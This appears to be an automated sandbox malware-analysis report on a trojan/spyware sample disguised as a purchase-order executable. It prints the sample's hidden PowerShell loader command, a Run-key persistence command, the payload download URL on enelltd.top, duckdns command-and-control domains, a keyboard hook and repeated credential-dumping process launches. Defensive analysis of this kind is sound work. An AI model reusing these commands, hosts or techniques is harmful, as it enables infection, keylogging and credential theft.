              Source: global trafficHTTP traffic detected: GET /XpMumnKrmZynRk242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: enelltd.topCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: enelltd.top
              Source: global trafficDNS traffic detected: DNS query: learfo55ozj02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: leirfo45ozj01.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp:
              Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpD
              Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpd
              Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpg
              Source: wab.exe, 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpq
              Source: PO-USC-22USC-KonchoCo.exe, 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO-USC-22USC-KonchoCo.exe, 00000000.00000000.1615338710.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.3483439341.0000000004881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3487057946.0000000006F3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.3483439341.0000000004881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wab.exe, 00000009.00000002.4123998720.0000000025110000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000002.4113065678.0000000009B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enelltd.top/XpMumnKrmZynRk242.bin
              Source: wab.exe, 00000009.00000002.4113065678.0000000009B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enelltd.top/XpMumnKrmZynRk242.bino
              Source: powershell.exe, 00000001.00000002.3483439341.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.3485653451.00000000058ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 104.21.45.139:443 -> 192.168.2.4:49739 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405846

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7188, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED
              Source: wab.exeProcess created: 66

              System Summary

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_082CAD3D Sleep,NtProtectVirtualMemory,9_2_082CAD3D
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_00406DA00_2_00406DA0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0435F0001_2_0435F000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0435F8D01_2_0435F8D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0435ECB81_2_0435ECB8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0704BB001_2_0704BB00
              Source: PO-USC-22USC-KonchoCo.exeStatic PE information: invalid certificate
              Source: PO-USC-22USC-KonchoCo.exe, 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameacrodontism.exeV vs PO-USC-22USC-KonchoCo.exe
              Source: PO-USC-22USC-KonchoCo.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1127/14@8/3
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AF2
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeFile created: C:\Users\user\AppData\Roaming\brosyJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1800:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\jmofvnb-6GMGJI
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeFile created: C:\Users\user\AppData\Local\Temp\nss8C28.tmpJump to behavior
              Source: PO-USC-22USC-KonchoCo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: PO-USC-22USC-KonchoCo.exeReversingLabs: Detection: 15%
              Source: PO-USC-22USC-KonchoCo.exeVirustotal: Detection: 11%
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeFile read: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
              Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"Jump to behavior
